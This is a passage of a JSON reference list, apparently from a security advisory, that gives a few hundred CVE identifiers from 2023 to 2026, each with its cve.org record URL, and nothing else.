"url": "https://www.cve.org/CVERecord?id=CVE-2025-71087"
},
{
"name": "CVE-2025-40039",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40039"
},
{
"name": "CVE-2025-71135",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71135"
},
{
"name": "CVE-2025-68746",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68746"
},
{
"name": "CVE-2025-68773",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68773"
},
{
"name": "CVE-2025-71133",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71133"
},
{
"name": "CVE-2026-23020",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23020"
},
{
"name": "CVE-2025-68796",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68796"
},
{
"name": "CVE-2025-68804",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68804"
},
{
"name": "CVE-2025-68769",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68769"
},
{
"name": "CVE-2025-68794",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68794"
},
{
"name": "CVE-2025-71189",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71189"
},
{
"name": "CVE-2025-38408",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38408"
},
{
"name": "CVE-2025-71088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71088"
},
{
"name": "CVE-2026-23090",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23090"
},
{
"name": "CVE-2026-23035",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23035"
},
{
"name": "CVE-2026-23064",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23064"
},
{
"name": "CVE-2025-38591",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38591"
},
{
"name": "CVE-2025-68806",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68806"
},
{
"name": "CVE-2025-71098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71098"
},
{
"name": "CVE-2025-71078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71078"
},
{
"name": "CVE-2025-71083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71083"
},
{
"name": "CVE-2026-23061",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23061"
},
{
"name": "CVE-2026-23059",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23059"
},
{
"name": "CVE-2025-68813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68813"
},
{
"name": "CVE-2026-23047",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23047"
},
{
"name": "CVE-2025-22121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22121"
},
{
"name": "CVE-2025-68365",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68365"
},
{
"name": "CVE-2025-71085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71085"
},
{
"name": "CVE-2025-71076",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71076"
},
{
"name": "CVE-2025-68344",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68344"
},
{
"name": "CVE-2025-71154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71154"
},
{
"name": "CVE-2025-68257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68257"
},
{
"name": "CVE-2025-71084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71084"
},
{
"name": "CVE-2026-23094",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23094"
},
{
"name": "CVE-2026-23049",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23049"
},
{
"name": "CVE-2025-68347",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68347"
},
{
"name": "CVE-2025-68770",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68770"
},
{
"name": "CVE-2025-68814",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68814"
},
{
"name": "CVE-2025-68780",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68780"
},
{
"name": "CVE-2025-71081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71081"
},
{
"name": "CVE-2026-23101",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23101"
},
{
"name": "CVE-2026-23099",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23099"
},
{
"name": "CVE-2025-71121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71121"
},
{
"name": "CVE-2025-38022",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38022"
},
{
"name": "CVE-2025-71080",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71080"
},
{
"name": "CVE-2026-22989",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22989"
},
{
"name": "CVE-2026-23085",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23085"
},
{
"name": "CVE-2025-71136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71136"
},
{
"name": "CVE-2025-68354",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68354"
},
{
"name": "CVE-2025-68801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68801"
},
{
"name": "CVE-2025-71073",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71073"
},
{
"name": "CVE-2025-22090",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22090"
},
{
"name": "CVE-2025-68258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68258"
},
{
"name": "CVE-2025-39871",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39871"
},
{
"name": "CVE-2026-23057",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23057"
},
{
"name": "CVE-2025-37926",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37926"
},
{
"name": "CVE-2025-71138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71138"
},
{
"name": "CVE-2025-68291",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68291"
},
{
"name": "CVE-2025-71122",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71122"
},
{
"name": "CVE-2026-22991",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22991"
},
{
"name": "CVE-2025-71144",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71144"
},
{
"name": "CVE-2025-68822",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68822"
},
{
"name": "CVE-2025-38234",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38234"
},
{
"name": "CVE-2025-21946",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21946"
},
{
"name": "CVE-2025-68255",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68255"
},
{
"name": "CVE-2026-22980",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22980"
},
{
"name": "CVE-2025-71093",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71093"
},
{
"name": "CVE-2025-71102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71102"
},
{
"name": "CVE-2026-23032",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23032"
},
{
"name": "CVE-2025-68759",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68759"
},
{
"name": "CVE-2026-23019",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23019"
},
{
"name": "CVE-2026-23055",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23055"
},
{
"name": "CVE-2025-68733",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68733"
},
{
"name": "CVE-2026-23005",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23005"
},
{
"name": "CVE-2025-68335",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68335"
},
{
"name": "CVE-2025-71079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71079"
},
{
"name": "CVE-2026-23030",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23030"
},
{
"name": "CVE-2026-22997",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22997"
},
{
"name": "CVE-2025-71153",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71153"
},
{
"name": "CVE-2025-71196",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71196"
},
{
"name": "CVE-2025-68772",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68772"
},
{
"name": "CVE-2026-23078",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23078"
},
{
"name": "CVE-2025-71143",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71143"
},
{
"name": "CVE-2025-68785",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68785"
},
{
"name": "CVE-2025-71130",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71130"
},
{
"name": "CVE-2025-68808",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68808"
},
{
"name": "CVE-2025-68223",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68223"
},
{
"name": "CVE-2025-68783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68783"
},
{
"name": "CVE-2025-71147",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71147"
},
{
"name": "CVE-2025-68724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68724"
},
{
"name": "CVE-2026-23103",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23103"
},
{
"name": "CVE-2026-23074",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23074"
},
{
"name": "CVE-2025-71126",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71126"
},
{
"name": "CVE-2025-68786",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68786"
},
{
"name": "CVE-2025-71199",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71199"
},
{
"name": "CVE-2024-42079",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42079"
},
{
"name": "CVE-2025-68797",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68797"
},
{
"name": "CVE-2024-49968",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49968"
},
{
"name": "CVE-2025-68358",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68358"
},
{
"name": "CVE-2025-68259",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68259"
},
{
"name": "CVE-2025-71125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71125"
},
{
"name": "CVE-2026-23006",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23006"
},
{
"name": "CVE-2025-71108",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71108"
},
{
"name": "CVE-2025-68789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68789"
},
{
"name": "CVE-2025-71069",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71069"
},
{
"name": "CVE-2026-23013",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23013"
},
{
"name": "CVE-2025-71195",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71195"
},
{
"name": "CVE-2026-22994",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22994"
},
{
"name": "CVE-2026-23083",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23083"
},
{
"name": "CVE-2026-23088",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23088"
},
{
"name": "CVE-2025-68774",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68774"
},
{
"name": "CVE-2026-23108",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23108"
},
{
"name": "CVE-2025-71180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71180"
},
{
"name": "CVE-2025-38232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38232"
},
{
"name": "CVE-2025-71194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71194"
},
{
"name": "CVE-2025-71157",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71157"
},
{
"name": "CVE-2026-23023",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23023"
},
{
"name": "CVE-2026-22999",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22999"
},
{
"name": "CVE-2025-71082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71082"
},
{
"name": "CVE-2026-23068",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23068"
},
{
"name": "CVE-2025-68765",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68765"
},
{
"name": "CVE-2026-23089",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23089"
},
{
"name": "CVE-2025-71132",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71132"
},
{
"name": "CVE-2026-23071",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23071"
},
{
"name": "CVE-2026-23056",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23056"
},
{
"name": "CVE-2025-71077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71077"
},
{
"name": "CVE-2025-71140",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71140"
},
{
"name": "CVE-2025-22111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22111"
},
{
"name": "CVE-2026-23063",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23063"
},
{
"name": "CVE-2026-23073",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23073"
},
{
"name": "CVE-2025-71114",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71114"
},
{
"name": "CVE-2026-23058",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23058"
},
{
"name": "CVE-2025-71067",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71067"
},
{
"name": "CVE-2025-71182",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71182"
},
{
"name": "CVE-2026-23038",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23038"
},
{
"name": "CVE-2025-71151",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71151"
},
{
"name": "CVE-2026-22990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22990"
},
{
"name": "CVE-2026-23000",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23000"
},
{
"name": "CVE-2025-71186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71186"
},
{
"name": "CVE-2025-68821",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68821"
},
{
"name": "CVE-2026-23026",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23026"
},
{
"name": "CVE-2025-68325",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68325"
},
{
"name": "CVE-2025-71190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71190"
},
{
"name": "CVE-2025-71089",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71089"
},
{
"name": "CVE-2026-23107",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23107"
},
{
"name": "CVE-2025-68332",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68332"
},
{
"name": "CVE-2025-71104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71104"
},
{
"name": "CVE-2026-22978",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22978"
},
{
"name": "CVE-2025-38129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38129"
},
{
"name": "CVE-2026-23037",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23037"
},
{
"name": "CVE-2025-71101",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71101"
},
{
"name": "CVE-2026-23001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23001"
},
{
"name": "CVE-2025-68367",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68367"
},
{
"name": "CVE-2025-68820",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68820"
},
{
"name": "CVE-2025-68740",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68740"
},
{
"name": "CVE-2025-68742",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68742"
},
{
"name": "CVE-2026-23025",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23025"
},
{
"name": "CVE-2024-46786",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46786"
},
{
"name": "CVE-2025-68816",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68816"
},
{
"name": "CVE-2025-68357",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68357"
},
{
"name": "CVE-2025-68256",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68256"
},
{
"name": "CVE-2025-68777",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68777"
},
{
"name": "CVE-2025-71129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71129"
},
{
"name": "CVE-2025-68254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68254"
},
{
"name": "CVE-2025-39872",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39872"
},
{
"name": "CVE-2026-22982",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22982"
},
{
"name": "CVE-2025-71109",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71109"
},
{
"name": "CVE-2025-71118",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71118"
},
{
"name": "CVE-2025-71150",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71150"
},
{
"name": "CVE-2025-39721",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39721"
},
{
"name": "CVE-2026-23091",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23091"
},
{
"name": "CVE-2025-38718",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38718"
},
{
"name": "CVE-2025-71192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71192"
},
{
"name": "CVE-2025-68776",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68776"
},
{
"name": "CVE-2025-71066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71066"
},
{
"name": "CVE-2025-68799",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68799"
},
{
"name": "CVE-2025-68345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68345"
},
{
"name": "CVE-2025-71097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71097"
},
{
"name": "CVE-2025-71107",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71107"
},
{
"name": "CVE-2025-71111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71111"
},
{
"name": "CVE-2026-23087",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23087"
},
{
"name": "CVE-2025-68802",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68802"
},
{
"name": "CVE-2025-71185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71185"
},
{
"name": "CVE-2025-68811",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68811"
},
{
"name": "CVE-2026-23096",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23096"
},
{
"name": "CVE-2025-68337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68337"
},
{
"name": "CVE-2025-68351",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68351"
},
{
"name": "CVE-2025-71131",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71131"
},
{
"name": "CVE-2025-40149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40149"
},
{
"name": "CVE-2025-40164",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40164"
},
{
"name": "CVE-2025-71116",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71116"
},
{
"name": "CVE-2023-52658",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52658"
},
{
"name": "CVE-2025-68362",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68362"
},
{
"name": "CVE-2026-23002",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23002"
},
{
"name": "CVE-2025-68333",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68333"
},
{
"name": "CVE-2025-71160",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71160"
},
{
"name": "CVE-2024-58096",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58096"
},
{
"name": "CVE-2025-71162",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71162"
},
{
"name": "CVE-2026-23075",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23075"
},
{
"name": "CVE-2025-68803",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68803"
},
{
"name": "CVE-2026-22996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22996"
},
{
"name": "CVE-2026-23105",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23105"
},
{
"name": "CVE-2026-22976",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22976"
},
{
"name": "CVE-2026-23065",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23065"
},
{
"name": "CVE-2025-68753",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68753"
},
{
"name": "CVE-2025-68781",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68781"
},
{
"name": "CVE-2025-68369",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68369"
},
{
"name": "CVE-2025-68775",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68775"
},
{
"name": "CVE-2025-71112",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71112"
},
{
"name": "CVE-2023-54285",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54285"
},
{
"name": "CVE-2026-23086",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23086"
},
{
"name": "CVE-2025-22022",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22022"
},
{
"name": "CVE-2025-68818",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68818"
},
{
"name": "CVE-2025-40170",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40170"
},
{
"name": "CVE-2025-38125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38125"
},
{
"name": "CVE-2025-71148",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71148"
},
{
"name": "CVE-2025-68366",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68366"
},
{
"name": "CVE-2025-68815",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68815"
},
{
"name": "CVE-2025-40215",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40215"
},
{
"name": "CVE-2025-71193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71193"
},
{
"name": "CVE-2026-23095",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23095"
},
{
"name": "CVE-2025-68346",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68346"
},
{
"name": "CVE-2025-71163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71163"
},
{
"name": "CVE-2026-23062",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23062"
},
{
"name": "CVE-2025-71096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71096"
},
{
"name": "CVE-2025-71099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71099"
},
{
"name": "CVE-2025-71095",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71095"
},
{
"name": "CVE-2025-71105",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71105"
},
{
"name": "CVE-2025-68266",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68266"
},
{
"name": "CVE-2025-68771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68771"
},
{
"name": "CVE-2025-68363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68363"
},
{
"name": "CVE-2026-22984",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22984"
},
{
"name": "CVE-2025-68757",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68757"
},
{
"name": "CVE-2024-58097",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58097"
},
{
"name": "CVE-2025-71068",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71068"
},
{
"name": "CVE-2026-23033",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23033"
},
{
"name": "CVE-2025-68784",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68784"
},
{
"name": "CVE-2026-22977",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22977"
},
{
"name": "CVE-2026-23003",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23003"
},
{
"name": "CVE-2025-68766",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68766"
},
{
"name": "CVE-2026-23076",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23076"
},
{
"name": "CVE-2025-68792",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68792"
},
{
"name": "CVE-2025-71123",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71123"
},
{
"name": "CVE-2025-68206",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68206"
},
{
"name": "CVE-2025-71100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71100"
},
{
"name": "CVE-2025-68372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68372"
},
{
"name": "CVE-2026-23010",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23010"
},
{
"name": "CVE-2025-71146",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71146"
},
{
"name": "CVE-2025-71137",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71137"
},
{
"name": "CVE-2026-23084",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23084"
},
{
"name": "CVE-2026-22979",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22979"
},
{
"name": "CVE-2026-23011",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23011"
},
{
"name": "CVE-2025-71156",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71156"
},
{
"name": "CVE-2025-40276",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40276"
},
{
"name": "CVE-2026-23110",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23110"
},
{
"name": "CVE-2025-68809",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68809"
},
{
"name": "CVE-2025-71120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71120"
},
{
"name": "CVE-2026-23060",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23060"
},
{
"name": "CVE-2025-68817",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68817"
},
{
"name": "CVE-2025-71119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71119"
},
{
"name": "CVE-2025-68787",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68787"
},
{
"name": "CVE-2025-68782",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68782"
},
{
"name": "CVE-2025-71197",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71197"
},
{
"name": "CVE-2025-68758",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68758"
},
{
"name": "CVE-2026-23031",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23031"
},
{
"name": "CVE-2025-71113",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71113"
},
{
"name": "CVE-2025-71127",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71127"
},
{
"name": "CVE-2026-23102",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23102"
},
{
"name": "CVE-2026-22998",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22998"
},
{
"name": "CVE-2026-23050",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23050"
},
{
"name": "CVE-2025-68340",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68340"
},
{
"name": "CVE-2025-40110",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40110"
},
{
"name": "CVE-2025-40325",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40325"
},
{
"name": "CVE-2025-68798",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68798"
},
{
"name": "CVE-2025-68336",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68336"
},
{
"name": "CVE-2025-68810",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68810"
},
{
"name": "CVE-2026-23097",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23097"
},
{
"name": "CVE-2025-71198",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71198"
},
{
"name": "CVE-2025-68819",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68819"
},
{
"name": "CVE-2025-71072",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71072"
},
{
"name": "CVE-2026-23021",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23021"
},
{
"name": "CVE-2025-68732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68732"
},
{
"name": "CVE-2026-23093",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23093"
},
{
"name": "CVE-2025-71183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71183"
},
{
"name": "CVE-2025-68371",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68371"
},
{
"name": "CVE-2025-68211",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68211"
},
{
"name": "CVE-2025-71091",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71091"
},
{
"name": "CVE-2026-23053",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23053"
},
{
"name": "CVE-2025-71184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71184"
},
{
"name": "CVE-2025-68263",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68263"
},
{
"name": "CVE-2025-68800",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68800"
},
{
"name": "CVE-2025-68261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68261"
},
{
"name": "CVE-2025-71149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71149"
},
{
"name": "CVE-2025-68767",
